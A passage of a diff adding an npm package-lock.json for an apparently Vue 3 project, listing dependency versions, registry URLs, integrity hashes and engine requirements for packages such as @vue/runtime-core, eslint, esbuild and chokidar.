"3.2.45", + "estree-walker": "^2.0.2", + "magic-string": "^0.25.7", + "postcss": "^8.1.10", + "source-map": "^0.6.1" + } + }, + "node_modules/@vue/compiler-ssr": { + "version": "3.2.45", + "resolved": "https://registry.npmjs.org/@vue/compiler-ssr/-/compiler-ssr-3.2.45.tgz", + "integrity": "sha512-6BRaggEGqhWht3lt24CrIbQSRD5O07MTmd+LjAn5fJj568+R9eUD2F7wMQJjX859seSlrYog7sUtrZSd7feqrQ==", + "dependencies": { + "@vue/compiler-dom": "3.2.45", + "@vue/shared": "3.2.45" + } + }, + "node_modules/@vue/devtools-api": { + "version": "6.5.0", + "resolved": "https://registry.npmjs.org/@vue/devtools-api/-/devtools-api-6.5.0.tgz", + "integrity": "sha512-o9KfBeaBmCKl10usN4crU53fYtC1r7jJwdGKjPT24t348rHxgfpZ0xL3Xm/gLUYnc0oTp8LAmrxOeLyu6tbk2Q==" + }, + "node_modules/@vue/reactivity": { + "version": "3.2.45", + "resolved": "https://registry.npmjs.org/@vue/reactivity/-/reactivity-3.2.45.tgz", + "integrity": "sha512-PRvhCcQcyEVohW0P8iQ7HDcIOXRjZfAsOds3N99X/Dzewy8TVhTCT4uXpAHfoKjVTJRA0O0K+6QNkDIZAxNi3A==", + "dependencies": { + "@vue/shared": "3.2.45" + } + }, + "node_modules/@vue/reactivity-transform": { + "version": "3.2.45", + "resolved": "https://registry.npmjs.org/@vue/reactivity-transform/-/reactivity-transform-3.2.45.tgz", + "integrity": "sha512-BHVmzYAvM7vcU5WmuYqXpwaBHjsS8T63jlKGWVtHxAHIoMIlmaMyurUSEs1Zcg46M4AYT5MtB1U274/2aNzjJQ==", + "dependencies": { + "@babel/parser": "^7.16.4", + "@vue/compiler-core": "3.2.45", + "@vue/shared": "3.2.45", + "estree-walker": "^2.0.2", + "magic-string": "^0.25.7" + } + }, + "node_modules/@vue/runtime-core": { + "version": "3.2.45", + "resolved": "https://registry.npmjs.org/@vue/runtime-core/-/runtime-core-3.2.45.tgz", + "integrity": "sha512-gzJiTA3f74cgARptqzYswmoQx0fIA+gGYBfokYVhF8YSXjWTUA2SngRzZRku2HbGbjzB6LBYSbKGIaK8IW+s0A==", + "dependencies": { + "@vue/reactivity": "3.2.45", + "@vue/shared": "3.2.45" + } + }, + "node_modules/@vue/runtime-dom": { + "version": "3.2.45", + "resolved": "https://registry.npmjs.org/@vue/runtime-dom/-/runtime-dom-3.2.45.tgz", + "integrity": "sha512-cy88YpfP5Ue2bDBbj75Cb4bIEZUMM/mAkDMfqDTpUYVgTf/kuQ2VQ8LebuZ8k6EudgH8pYhsGWHlY0lcxlvTwA==", + "dependencies": { + "@vue/runtime-core": "3.2.45", + "@vue/shared": "3.2.45", + "csstype": "^2.6.8" + } + }, + "node_modules/@vue/server-renderer": { + "version": "3.2.45", + "resolved": "https://registry.npmjs.org/@vue/server-renderer/-/server-renderer-3.2.45.tgz", + "integrity": "sha512-ebiMq7q24WBU1D6uhPK//2OTR1iRIyxjF5iVq/1a5I1SDMDyDu4Ts6fJaMnjrvD3MqnaiFkKQj+LKAgz5WIK3g==", + "dependencies": { + "@vue/compiler-ssr": "3.2.45", + "@vue/shared": "3.2.45" + }, + "peerDependencies": { + "vue": "3.2.45" + } + }, + "node_modules/@vue/shared": { + "version": "3.2.45", + "resolved": "https://registry.npmjs.org/@vue/shared/-/shared-3.2.45.tgz", + "integrity": "sha512-Ewzq5Yhimg7pSztDV+RH1UDKBzmtqieXQlpTVm2AwraoRL/Rks96mvd8Vgi7Lj+h+TH8dv7mXD3FRZR3TUvbSg==" + }, + "node_modules/acorn": { + "version": "8.8.2", + "resolved": "https://registry.npmjs.org/acorn/-/acorn-8.8.2.tgz", + "integrity": "sha512-xjIYgE8HBrkpd/sJqOGNspf8uHG+NOHGOw6a/Urj8taM2EXfdNAH2oFcPeIFfsv3+kz/mJrS5VuMqbNLjCa2vw==", + "dev": true, + "bin": { + "acorn": "bin/acorn" + }, + "engines": { + "node": ">=0.4.0" + } + }, + "node_modules/acorn-jsx": { + "version": "5.3.2", + "resolved": "https://registry.npmjs.org/acorn-jsx/-/acorn-jsx-5.3.2.tgz", + "integrity": "sha512-rq9s+JNhf0IChjtDXxllJ7g41oZk5SlXtp0LHwyA5cejwn7vKmKp4pPri6YEePv2PU65sAsegbXtIinmDFDXgQ==", + "dev": true, + "peerDependencies": { + "acorn": "^6.0.0 || ^7.0.0 || ^8.0.0" + } + }, + "node_modules/acorn-node": { + "version": "1.8.2", + "resolved": "https://registry.npmjs.org/acorn-node/-/acorn-node-1.8.2.tgz", + "integrity": "sha512-8mt+fslDufLYntIoPAaIMUe/lrbrehIiwmR3t2k9LljIzoigEPF27eLk2hy8zSGzmR/ogr7zbRKINMo1u0yh5A==", + "dev": true, + "dependencies": { + "acorn": "^7.0.0", + "acorn-walk": "^7.0.0", + "xtend": "^4.0.2" + } + }, + "node_modules/acorn-node/node_modules/acorn": { + "version": "7.4.1", + "resolved": "https://registry.npmjs.org/acorn/-/acorn-7.4.1.tgz", + "integrity": "sha512-nQyp0o1/mNdbTO1PO6kHkwSrmgZ0MT/jCCpNiwbUjGoRN4dlBhqJtoQuCnEOKzgTVwg0ZWiCoQy6SxMebQVh8A==", + "dev": true, + "bin": { + "acorn": "bin/acorn" + }, + "engines": { + "node": ">=0.4.0" + } + }, + "node_modules/acorn-walk": { + "version": "7.2.0", + "resolved": "https://registry.npmjs.org/acorn-walk/-/acorn-walk-7.2.0.tgz", + "integrity": "sha512-OPdCF6GsMIP+Az+aWfAAOEt2/+iVDKE7oy6lJ098aoe59oAmK76qV6Gw60SbZ8jHuG2wH058GF4pLFbYamYrVA==", + "dev": true, + "engines": { + "node": ">=0.4.0" + } + }, + "node_modules/ajv": { + "version": "6.12.6", + "resolved": "https://registry.npmjs.org/ajv/-/ajv-6.12.6.tgz", + "integrity": "sha512-j3fVLgvTo527anyYyJOGTYJbG+vnnQYvE0m5mmkc1TK+nxAppkCLMIL0aZ4dblVCNoGShhm+kzE4ZUykBoMg4g==", + "dev": true, + "dependencies": { + "fast-deep-equal": "^3.1.1", + "fast-json-stable-stringify": "^2.0.0", + "json-schema-traverse": "^0.4.1", + "uri-js": "^4.2.2" + }, + "funding": { + "type": "github", + "url": "https://github.com/sponsors/epoberezkin" + } + }, + "node_modules/ansi-regex": { + "version": "5.0.1", + "resolved": "https://registry.npmjs.org/ansi-regex/-/ansi-regex-5.0.1.tgz", + "integrity": "sha512-quJQXlTSUGL2LH9SUXo8VwsY4soanhgo6LNSm84E1LBcE8s3O0wpdiRzyR9z/ZZJMlMWv37qOOb9pdJlMUEKFQ==", + "dev": true, + "engines": { + "node": ">=8" + } + }, + "node_modules/ansi-styles": { + "version": "4.3.0", + "resolved": "https://registry.npmjs.org/ansi-styles/-/ansi-styles-4.3.0.tgz", + "integrity": "sha512-zbB9rCJAT1rbjiVDb2hqKFHNYLxgtk8NURxZ3IZwD3F6NtxbXZQCnnSi1Lkx+IDohdPlFp222wVALIheZJQSEg==", + "dev": true, + "dependencies": { + "color-convert": "^2.0.1" + }, + "engines": { + "node": ">=8" + }, + "funding": { + "url": "https://github.com/chalk/ansi-styles?sponsor=1" + } + }, + "node_modules/anymatch": { + "version": "3.1.3", + "resolved": "https://registry.npmjs.org/anymatch/-/anymatch-3.1.3.tgz", + "integrity": "sha512-KMReFUr0B4t+D+OBkjR3KYqvocp2XaSzO55UcB6mgQMd3KbcE+mWTyvVV7D/zsdEbNnV6acZUutkiHQXvTr1Rw==", + "dev": true, + "dependencies": { + "normalize-path": "^3.0.0", + "picomatch": "^2.0.4" + }, + "engines": { + "node": ">= 8" + } + }, + "node_modules/arg": { + "version": "5.0.2", + "resolved": "https://registry.npmjs.org/arg/-/arg-5.0.2.tgz", + "integrity": "sha512-PYjyFOLKQ9y57JvQ6QLo8dAgNqswh8M1RMJYdQduT6xbWSgK36P/Z/v+p888pM69jMMfS8Xd8F6I1kQ/I9HUGg==", + "dev": true + }, + "node_modules/argparse": { + "version": "2.0.1", + "resolved": "https://registry.npmjs.org/argparse/-/argparse-2.0.1.tgz", + "integrity": "sha512-8+9WqebbFzpX9OR+Wa6O29asIogeRMzcGtAINdpMHHyAg10f05aSFVBbcEqGf/PXw1EjAZ+q2/bEBg3DvurK3Q==", + "dev": true + }, + "node_modules/array-union": { + "version": "2.1.0", + "resolved": "https://registry.npmjs.org/array-union/-/array-union-2.1.0.tgz", + "integrity": "sha512-HGyxoOTYUyCM6stUe6EJgnd4EoewAI7zMdfqO+kGjnlZmBDz/cR5pf8r/cR4Wq60sL/p0IkcjUEEPwS3GFrIyw==", + "dev": true, + "engines": { + "node": ">=8" + } + }, + "node_modules/autoprefixer": { + "version": "10.4.13", + "resolved": "https://registry.npmjs.org/autoprefixer/-/autoprefixer-10.4.13.tgz", + "integrity": "sha512-49vKpMqcZYsJjwotvt4+h/BCjJVnhGwcLpDt5xkcaOG3eLrG/HUYLagrihYsQ+qrIBgIzX1Rw7a6L8I/ZA1Atg==", + "dev": true, + "funding": [ + { + "type": "opencollective", + "url": "https://opencollective.com/postcss/" + }, + { + "type": "tidelift", + "url": "https://tidelift.com/funding/github/npm/autoprefixer" + } + ], + "dependencies": { + "browserslist": "^4.21.4", + "caniuse-lite": "^1.0.30001426", + "fraction.js": "^4.2.0", + "normalize-range": "^0.1.2", + "picocolors": "^1.0.0", + "postcss-value-parser": "^4.2.0" + }, + "bin": { + "autoprefixer": "bin/autoprefixer" + }, + "engines": { + "node": "^10 || ^12 || >=14" + }, + "peerDependencies": { + "postcss": "^8.1.0" + } + }, + "node_modules/balanced-match": { + "version": "1.0.2", + "resolved": "https://registry.npmjs.org/balanced-match/-/balanced-match-1.0.2.tgz", + "integrity": "sha512-3oSeUO0TMV67hN1AmbXsK4yaqU7tjiHlbxRDZOpH0KW9+CeX4bRAaX0Anxt0tx2MrpRpWwQaPwIlISEJhYU5Pw==", + "dev": true + }, + "node_modules/binary-extensions": { + "version": "2.2.0", + "resolved": "https://registry.npmjs.org/binary-extensions/-/binary-extensions-2.2.0.tgz", + "integrity": "sha512-jDctJ/IVQbZoJykoeHbhXpOlNBqGNcwXJKJog42E5HDPUwQTSdjCHdihjj0DlnheQ7blbT6dHOafNAiS8ooQKA==", + "dev": true, + "engines": { + "node": ">=8" + } + }, + "node_modules/boolbase": { + "version": "1.0.0", + "resolved": "https://registry.npmjs.org/boolbase/-/boolbase-1.0.0.tgz", + "integrity": "sha512-JZOSA7Mo9sNGB8+UjSgzdLtokWAky1zbztM3WRLCbZ70/3cTANmQmOdR7y2g+J0e2WXywy1yS468tY+IruqEww==", + "dev": true + }, + "node_modules/brace-expansion": { + "version": "1.1.11", + "resolved": "https://registry.npmjs.org/brace-expansion/-/brace-expansion-1.1.11.tgz", + "integrity": "sha512-iCuPHDFgrHX7H2vEI/5xpz07zSHB00TpugqhmYtVmMO6518mCuRMoOYFldEBl0g187ufozdaHgWKcYFb61qGiA==", + "dev": true, + "dependencies": { + "balanced-match": "^1.0.0", + "concat-map": "0.0.1" + } + }, + "node_modules/braces": { + "version": "3.0.2", + "resolved": "https://registry.npmjs.org/braces/-/braces-3.0.2.tgz", + "integrity": "sha512-b8um+L1RzM3WDSzvhm6gIz1yfTbBt6YTlcEKAvsmqCZZFw46z626lVj9j1yEPW33H5H+lBQpZMP1k8l+78Ha0A==", + "dev": true, + "dependencies": { + "fill-range": "^7.0.1" + }, + "engines": { + "node": ">=8" + } + }, + "node_modules/browserslist": { + "version": "4.21.4", + "resolved": "https://registry.npmjs.org/browserslist/-/browserslist-4.21.4.tgz", + "integrity": "sha512-CBHJJdDmgjl3daYjN5Cp5kbTf1mUhZoS+beLklHIvkOWscs83YAhLlF3Wsh/lciQYAcbBJgTOD44VtG31ZM4Hw==", + "dev": true, + "funding": [ + { + "type": "opencollective", + "url": "https://opencollective.com/browserslist" + }, + { + "type": "tidelift", + "url": "https://tidelift.com/funding/github/npm/browserslist" + } + ], + "dependencies": { + "caniuse-lite": "^1.0.30001400", + "electron-to-chromium": "^1.4.251", + "node-releases": "^2.0.6", + "update-browserslist-db": "^1.0.9" + }, + "bin": { + "browserslist": "cli.js" + }, + "engines": { + "node": "^6 || ^7 || ^8 || ^9 || ^10 || ^11 || ^12 || >=13.7" + } + }, + "node_modules/callsites": { + "version": "3.1.0", + "resolved": "https://registry.npmjs.org/callsites/-/callsites-3.1.0.tgz", + "integrity": "sha512-P8BjAsXvZS+VIDUI11hHCQEv74YT67YUi5JJFNWIqL235sBmjX4+qx9Muvls5ivyNENctx46xQLQ3aTuE7ssaQ==", + "dev": true, + "engines": { + "node": ">=6" + } + }, + "node_modules/camelcase-css": { + "version": "2.0.1", + "resolved": "https://registry.npmjs.org/camelcase-css/-/camelcase-css-2.0.1.tgz", + "integrity": "sha512-QOSvevhslijgYwRx6Rv7zKdMF8lbRmx+uQGx2+vDc+KI/eBnsy9kit5aj23AgGu3pa4t9AgwbnXWqS+iOY+2aA==", + "dev": true, + "engines": { + "node": ">= 6" + } + }, + "node_modules/caniuse-lite": { + "version": "1.0.30001448", + "resolved": "https://registry.npmjs.org/caniuse-lite/-/caniuse-lite-1.0.30001448.tgz", + "integrity": "sha512-tq2YI+MJnooG96XpbTRYkBxLxklZPOdLmNIOdIhvf7SNJan6u5vCKum8iT7ZfCt70m1GPkuC7P3TtX6UuhupuA==", + "dev": true, + "funding": [ + { + "type": "opencollective", + "url": "https://opencollective.com/browserslist" + }, + { + "type": "tidelift", + "url": "https://tidelift.com/funding/github/npm/caniuse-lite" + } + ] + }, + "node_modules/chalk": { + "version": "4.1.2", + "resolved": "https://registry.npmjs.org/chalk/-/chalk-4.1.2.tgz", + "integrity": "sha512-oKnbhFyRIXpUuez8iBMmyEa4nbj4IOQyuhc/wy9kY7/WVPcwIO9VA668Pu8RkO7+0G76SLROeyw9CpQ061i4mA==", + "dev": true, + "dependencies": { + "ansi-styles": "^4.1.0", + "supports-color": "^7.1.0" + }, + "engines": { + "node": ">=10" + }, + "funding": { + "url": "https://github.com/chalk/chalk?sponsor=1" + } + }, + "node_modules/chokidar": { + "version": "3.5.3", + "resolved": "https://registry.npmjs.org/chokidar/-/chokidar-3.5.3.tgz", + "integrity": "sha512-Dr3sfKRP6oTcjf2JmUmFJfeVMvXBdegxB0iVQ5eb2V10uFJUCAS8OByZdVAyVb8xXNz3GjjTgj9kLWsZTqE6kw==", + "dev": true, + "funding": [ + { + "type": "individual", + "url": "https://paulmillr.com/funding/" + } + ], + "dependencies": { + "anymatch": "~3.1.2", + "braces": "~3.0.2", + "glob-parent": "~5.1.2", + "is-binary-path": "~2.1.0", + "is-glob": "~4.0.1", + "normalize-path": "~3.0.0", + "readdirp": "~3.6.0" + }, + "engines": { + "node": ">= 8.10.0" + }, + "optionalDependencies": { + "fsevents": "~2.3.2" + } + }, + "node_modules/chokidar/node_modules/glob-parent": { + "version": "5.1.2", + "resolved": "https://registry.npmjs.org/glob-parent/-/glob-parent-5.1.2.tgz", + "integrity": "sha512-AOIgSQCepiJYwP3ARnGx+5VnTu2HBYdzbGP45eLw1vr3zB3vZLeyed1sC9hnbcOc9/SrMyM5RPQrkGz4aS9Zow==", + "dev": true, + "dependencies": { + "is-glob": "^4.0.1" + }, + "engines": { + "node": ">= 6" + } + }, + "node_modules/color-convert": { + "version": "2.0.1", + "resolved": "https://registry.npmjs.org/color-convert/-/color-convert-2.0.1.tgz", + "integrity": "sha512-RRECPsj7iu/xb5oKYcsFHSppFNnsj/52OVTRKb4zP5onXwVF3zVmmToNcOfGC+CRDpfK/U584fMg38ZHCaElKQ==", + "dev": true, + "dependencies": { + "color-name": "~1.1.4" + }, + "engines": { + "node": ">=7.0.0" + } + }, + "node_modules/color-name": { + "version": "1.1.4", + "resolved": "https://registry.npmjs.org/color-name/-/color-name-1.1.4.tgz", + "integrity": "sha512-dOy+3AuW3a2wNbZHIuMZpTcgjGuLU/uBL/ubcZF9OXbDo8ff4O8yVp5Bf0efS8uEoYo5q4Fx7dY9OgQGXgAsQA==", + "dev": true + }, + "node_modules/concat-map": { + "version": "0.0.1", + "resolved": "https://registry.npmjs.org/concat-map/-/concat-map-0.0.1.tgz", + "integrity": "sha512-/Srv4dswyQNBfohGpz9o6Yb3Gz3SrUDqBH5rTuhGR7ahtlbYKnVxw2bCFMRljaA7EXHaXZ8wsHdodFvbkhKmqg==", + "dev": true + }, + "node_modules/cross-spawn": { + "version": "7.0.3", + "resolved": "https://registry.npmjs.org/cross-spawn/-/cross-spawn-7.0.3.tgz", + "integrity": "sha512-iRDPJKUPVEND7dHPO8rkbOnPpyDygcDFtWjpeWNCgy8WP2rXcxXL8TskReQl6OrB2G7+UJrags1q15Fudc7G6w==", + "dev": true, + "dependencies": { + "path-key": "^3.1.0", + "shebang-command": "^2.0.0", + "which": "^2.0.1" + }, + "engines": { + "node": ">= 8" + } + }, + "node_modules/cssesc": { + "version": "3.0.0", + "resolved": "https://registry.npmjs.org/cssesc/-/cssesc-3.0.0.tgz", + "integrity": "sha512-/Tb/JcjK111nNScGob5MNtsntNM1aCNUDipB/TkwZFhyDrrE47SOx/18wF2bbjgc3ZzCSKW1T5nt5EbFoAz/Vg==", + "dev": true, + "bin": { + "cssesc": "bin/cssesc" + }, + "engines": { + "node": ">=4" + } + }, + "node_modules/csstype": { + "version": "2.6.21", + "resolved": "https://registry.npmjs.org/csstype/-/csstype-2.6.21.tgz", + "integrity": "sha512-Z1PhmomIfypOpoMjRQB70jfvy/wxT50qW08YXO5lMIJkrdq4yOTR+AW7FqutScmB9NkLwxo+jU+kZLbofZZq/w==" + }, + "node_modules/debug": { + "version": "4.3.4", + "resolved": "https://registry.npmjs.org/debug/-/debug-4.3.4.tgz", + "integrity": "sha512-PRWFHuSU3eDtQJPvnNY7Jcket1j0t5OuOsFzPPzsekD52Zl8qUfFIPEiswXqIvHWGVHOgX+7G/vCNNhehwxfkQ==", + "dev": true, + "dependencies": { + "ms": "2.1.2" + }, + "engines": { + "node": ">=6.0" + }, + "peerDependenciesMeta": { + "supports-color": { + "optional": true + } + } + }, + "node_modules/deep-is": { + "version": "0.1.4", + "resolved": "https://registry.npmjs.org/deep-is/-/deep-is-0.1.4.tgz", + "integrity": "sha512-oIPzksmTg4/MriiaYGO+okXDT7ztn/w3Eptv/+gSIdMdKsJo0u4CfYNFJPy+4SKMuCqGw2wxnA+URMg3t8a/bQ==", + "dev": true + }, + "node_modules/defined": { + "version": "1.0.1", + "resolved": "https://registry.npmjs.org/defined/-/defined-1.0.1.tgz", + "integrity": "sha512-hsBd2qSVCRE+5PmNdHt1uzyrFu5d3RwmFDKzyNZMFq/EwDNJF7Ee5+D5oEKF0hU6LhtoUF1macFvOe4AskQC1Q==", + "dev": true, + "funding": { + "url": "https://github.com/sponsors/ljharb" + } + }, + "node_modules/detective": { + "version": "5.2.1", + "resolved": "https://registry.npmjs.org/detective/-/detective-5.2.1.tgz", + "integrity": "sha512-v9XE1zRnz1wRtgurGu0Bs8uHKFSTdteYZNbIPFVhUZ39L/S79ppMpdmVOZAnoz1jfEFodc48n6MX483Xo3t1yw==", + "dev": true, + "dependencies": { + "acorn-node": "^1.8.2", + "defined": "^1.0.0", + "minimist": "^1.2.6" + }, + "bin": { + "detective": "bin/detective.js" + }, + "engines": { + "node": ">=0.8.0" + } + }, + "node_modules/didyoumean": { + "version": "1.2.2", + "resolved": "https://registry.npmjs.org/didyoumean/-/didyoumean-1.2.2.tgz", + "integrity": "sha512-gxtyfqMg7GKyhQmb056K7M3xszy/myH8w+B4RT+QXBQsvAOdc3XymqDDPHx1BgPgsdAA5SIifona89YtRATDzw==", + "dev": true + }, + "node_modules/dir-glob": { + "version": "3.0.1", + "resolved": "https://registry.npmjs.org/dir-glob/-/dir-glob-3.0.1.tgz", + "integrity": "sha512-WkrWp9GR4KXfKGYzOLmTuGVi1UWFfws377n9cc55/tb6DuqyF6pcQ5AbiHEshaDpY9v6oaSr2XCDidGmMwdzIA==", + "dev": true, + "dependencies": { + "path-type": "^4.0.0" + }, + "engines": { + "node": ">=8" + } + }, + "node_modules/dlv": { + "version": "1.1.3", + "resolved": "https://registry.npmjs.org/dlv/-/dlv-1.1.3.tgz", + "integrity": "sha512-+HlytyjlPKnIG8XuRG8WvmBP8xs8P71y+SKKS6ZXWoEgLuePxtDoUEiH7WkdePWrQ5JBpE6aoVqfZfJUQkjXwA==", + "dev": true + }, + "node_modules/doctrine": { + "version": "3.0.0", + "resolved": "https://registry.npmjs.org/doctrine/-/doctrine-3.0.0.tgz", + "integrity": "sha512-yS+Q5i3hBf7GBkd4KG8a7eBNNWNGLTaEwwYWUijIYM7zrlYDM0BFXHjjPWlWZ1Rg7UaddZeIDmi9jF3HmqiQ2w==", + "dev": true, + "dependencies": { + "esutils": "^2.0.2" + }, + "engines": { + "node": ">=6.0.0" + } + }, + "node_modules/electron-to-chromium": { + "version": "1.4.284", + "resolved": "https://registry.npmjs.org/electron-to-chromium/-/electron-to-chromium-1.4.284.tgz", + "integrity": "sha512-M8WEXFuKXMYMVr45fo8mq0wUrrJHheiKZf6BArTKk9ZBYCKJEOU5H8cdWgDT+qCVZf7Na4lVUaZsA+h6uA9+PA==", + "dev": true + }, + "node_modules/esbuild": { + "version": "0.18.20", + "resolved": "https://registry.npmjs.org/esbuild/-/esbuild-0.18.20.tgz", + "integrity": "sha512-ceqxoedUrcayh7Y7ZX6NdbbDzGROiyVBgC4PriJThBKSVPWnnFHZAkfI1lJT8QFkOwH4qOS2SJkS4wvpGl8BpA==", + "dev": true, + "hasInstallScript": true, + "bin": { + "esbuild": "bin/esbuild" + }, + "engines": { + "node": ">=12" + }, + "optionalDependencies": { + "@esbuild/android-arm": "0.18.20", + "@esbuild/android-arm64": "0.18.20", + "@esbuild/android-x64": "0.18.20", + "@esbuild/darwin-arm64": "0.18.20", + "@esbuild/darwin-x64": "0.18.20", + "@esbuild/freebsd-arm64": "0.18.20", + "@esbuild/freebsd-x64": "0.18.20", + "@esbuild/linux-arm": "0.18.20", + "@esbuild/linux-arm64": "0.18.20", + "@esbuild/linux-ia32": "0.18.20", + "@esbuild/linux-loong64": "0.18.20", + "@esbuild/linux-mips64el": "0.18.20", + "@esbuild/linux-ppc64": "0.18.20", + "@esbuild/linux-riscv64": "0.18.20", + "@esbuild/linux-s390x": "0.18.20", + "@esbuild/linux-x64": "0.18.20", + "@esbuild/netbsd-x64": "0.18.20", + "@esbuild/openbsd-x64": "0.18.20", + "@esbuild/sunos-x64": "0.18.20", + "@esbuild/win32-arm64": "0.18.20", + "@esbuild/win32-ia32": "0.18.20", + "@esbuild/win32-x64": "0.18.20" + } + }, + "node_modules/escalade": { + "version": "3.1.1", + "resolved": "https://registry.npmjs.org/escalade/-/escalade-3.1.1.tgz", + "integrity": "sha512-k0er2gUkLf8O0zKJiAhmkTnJlTvINGv7ygDNPbeIsX/TJjGJZHuh9B2UxbsaEkmlEo9MfhrSzmhIlhRlI2GXnw==", + "dev": true, + "engines": { + "node": ">=6" + } + }, + "node_modules/escape-string-regexp": { + "version": "4.0.0", + "resolved": "https://registry.npmjs.org/escape-string-regexp/-/escape-string-regexp-4.0.0.tgz", + "integrity": "sha512-TtpcNJ3XAzx3Gq8sWRzJaVajRs0uVxA2YAkdb1jm2YkPz4G6egUFAyA3n5vtEIZefPk5Wa4UXbKuS5fKkJWdgA==", + "dev": true, + "engines": { + "node": ">=10" + }, + "funding": { + "url": "https://github.com/sponsors/sindresorhus" + } + }, + "node_modules/eslint": { + "version": "8.32.0", + "resolved": "https://registry.npmjs.org/eslint/-/eslint-8.32.0.tgz", + "integrity": "sha512-nETVXpnthqKPFyuY2FNjz/bEd6nbosRgKbkgS/y1C7LJop96gYHWpiguLecMHQ2XCPxn77DS0P+68WzG6vkZSQ==", + "dev": true, + "dependencies": { + "@eslint/eslintrc": "^1.4.1", + "@humanwhocodes/config-array": "^0.11.8", + "@humanwhocodes/module-importer": "^1.0.1", + "@nodelib/fs.walk": "^1.2.8", + "ajv": "^6.10.0", + "chalk": "^4.0.0", + "cross-spawn": "^7.0.2", + "debug": "^4.3.2", + "doctrine": "^3.0.0", + "escape-string-regexp": "^4.0.0", + "eslint-scope": "^7.1.1", + "eslint-utils": "^3.0.0", + "eslint-visitor-keys": "^3.3.0", + "espree": "^9.4.0", + "esquery": "^1.4.0", + "esutils": "^2.0.2", + "fast-deep-equal": "^3.1.3", + "file-entry-cache": "^6.0.1", + "find-up": "^5.0.0", + "glob-parent": "^6.0.2", + "globals": "^13.19.0", + "grapheme-splitter": "^1.0.4", + "ignore": "^5.2.0", + "import-fresh": "^3.0.0", + "imurmurhash": "^0.1.4", + "is-glob": "^4.0.0", + "is-path-inside": "^3.0.3", + "js-sdsl": "^4.1.4", + "js-yaml": "^4.1.0", + "json-stable-stringify-without-jsonify": "^1.0.1", + "levn": "^0.4.1", + "lodash.merge": "^4.6.2", + "minimatch": "^3.1.2", + "natural-compare": "^1.4.0", + "optionator": "^0.9.1", + "regexpp": "^3.2.0", + "strip-ansi": "^6.0.1", + "strip-json-comments": "^3.1.0", + "text-table": "^0.2.0" + }, + "bin": { + "eslint": "bin/eslint.js" + }, + "engines": { + "node": "^12.22.0 || ^14.17.0 || >=16.0.0" + }, + "funding": { + "url": "https://opencollective.com/eslint" + } + }, + "node_modules/eslint-plugin-vue": { + "version": "9.9.0", + "resolved": "https://registry.npmjs.org/eslint-plugin-vue/-/eslint-plugin-vue-9.9.0.tgz", + "integrity": "sha512-YbubS7eK0J7DCf0U2LxvVP7LMfs6rC6UltihIgval3azO3gyDwEGVgsCMe1TmDiEkl6GdMKfRpaME6QxIYtzDQ==", + "dev": true, + "dependencies": { + "eslint-utils": "^3.0.0", + "natural-compare": "^1.4.0", + "nth-check": "^2.0.1", + "postcss-selector-parser": "^6.0.9", + "semver": "^7.3.5", + "vue-eslint-parser": "^9.0.1", + "xml-name-validator": "^4.0.0" + }, + "engines": { + "node": "^14.17.0 || >=16.0.0" + }, + "peerDependencies": { + "eslint": "^6.2.0 || ^7.0.0 || ^8.0.0" + } + }, + "node_modules/eslint-scope": { + "version": "7.1.1", + "resolved": "https://registry.npmjs.org/eslint-scope/-/eslint-scope-7.1.1.tgz", + "integrity": "sha512-QKQM/UXpIiHcLqJ5AOyIW7XZmzjkzQXYE54n1++wb0u9V/abW3l9uQnxX8Z5Xd18xyKIMTUAyQ0k1e8pz6LUrw==", + "dev": true, + "dependencies": { + "esrecurse": "^4.3.0", + "estraverse": "^5.2.0" + }, + "engines": { + "node": "^12.22.0 || ^14.17.0 || >=16.0.0" + } + }, + "node_modules/eslint-utils": { + "version": "3.0.0", + "resolved": "https://registry.npmjs.org/eslint-utils/-/eslint-utils-3.0.0.tgz", + "integrity": "sha512-uuQC43IGctw68pJA1RgbQS8/NP7rch6Cwd4j3ZBtgo4/8Flj4eGE7ZYSZRN3iq5pVUv6GPdW5Z1RFleo84uLDA==", + "dev": true, + "dependencies": { + "eslint-visitor-keys": "^2.0.0" + }, + "engines": { + "node": "^10.0.0 || ^12.0.0 || >= 14.0.0" + }, + "funding": { + "url": "https://github.com/sponsors/mysticatea" + }, + "peerDependencies": { + "eslint": ">=5" + } + }, + "node_modules/eslint-utils/node_modules/eslint-visitor-keys": { + "version": "2.1.0", + "resolved": "https://registry.npmjs.org/eslint-visitor-keys/-/eslint-visitor-keys-2.1.0.tgz", + "integrity": "sha512-0rSmRBzXgDzIsD6mGdJgevzgezI534Cer5L/vyMX0kHzT/jiB43jRhd9YUlMGYLQy2zprNmoT8qasCGtY+QaKw==", + "dev": true, + "engines": { + "node": ">=10" + } + }, + "node_modules/eslint-visitor-keys": { + "version": "3.3.0", + "resolved": "https://registry.npmjs.org/eslint-visitor-keys/-/eslint-visitor-keys-3.3.0.tgz", + "integrity": "sha512-mQ+suqKJVyeuwGYHAdjMFqjCyfl8+Ldnxuyp3ldiMBFKkvytrXUZWaiPCEav8qDHKty44bD+qV1IP4T+w+xXRA==", + "dev": true, + "engines": { + "node": "^12.22.0 || ^14.17.0 || >=16.0.0" + } + }, + "node_modules/espree": { + "version": "9.4.1", + "resolved": "https://registry.npmjs.org/espree/-/espree-9.4.1.tgz", + "integrity": "sha512-XwctdmTO6SIvCzd9810yyNzIrOrqNYV9Koizx4C/mRhf9uq0o4yHoCEU/670pOxOL/MSraektvSAji79kX90Vg==", + "dev": true, + "dependencies": { + "acorn": "^8.8.0", + "acorn-jsx": "^5.3.2", + "eslint-visitor-keys": "^3.3.0" + }, + "engines": { + "node": "^12.22.0 || ^14.17.0 || >=16.0.0" + }, + "funding": { + "url": "https://opencollective.com/eslint" + } + }, + "node_modules/esquery": { + "version": "1.4.0", + "resolved": "https://registry.npmjs.org/esquery/-/esquery-1.4.0.tgz", + "integrity": "sha512-cCDispWt5vHHtwMY2YrAQ4ibFkAL8RbH5YGBnZBc90MolvvfkkQcJro/aZiAQUlQ3qgrYS6D6v8Gc5G5CQsc9w==", + "dev": true, + "dependencies": { + "estraverse": "^5.1.0" + }, + "engines": { + "node": ">=0.10" + } + }, + "node_modules/esrecurse": { + "version": "4.3.0", + "resolved": "https://registry.npmjs.org/esrecurse/-/esrecurse-4.3.0.tgz", + "integrity": "sha512-KmfKL3b6G+RXvP8N1vr3Tq1kL/oCFgn2NYXEtqP8/L3pKapUA4G8cFVaoF3SU323CD4XypR/ffioHmkti6/Tag==", + "dev": true, + "dependencies": { + "estraverse": "^5.2.0" + }, + "engines": { + "node": ">=4.0" + } + }, + "node_modules/estraverse": { + "version": "5.3.0", + "resolved": "https://registry.npmjs.org/estraverse/-/estraverse-5.3.0.tgz", + "integrity": 